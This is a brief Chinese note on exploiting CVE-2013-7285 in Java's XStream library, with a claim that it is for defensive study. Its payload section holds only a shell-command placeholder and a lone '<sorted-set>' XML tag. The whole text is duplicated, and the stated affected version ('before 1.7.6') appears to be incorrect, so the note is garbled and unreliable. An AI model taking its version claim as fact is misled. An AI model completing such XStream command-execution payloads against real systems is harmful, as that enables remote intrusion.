【笔记】CVE-2013-7285漏洞利用
前言
Java的com.thoughtworks.xstream.XStream
包的1.7.6以前的版本出现的CVE-2013-7285的漏洞利用
本文仅用于网络信息防御学习
payload
<<command>>
:Shell命令
1 | <sorted-set> |
Java的com.thoughtworks.xstream.XStream
包的1.7.6以前的版本出现的CVE-2013-7285的漏洞利用
本文仅用于网络信息防御学习
<<command>>
:Shell命令
1 | <sorted-set> |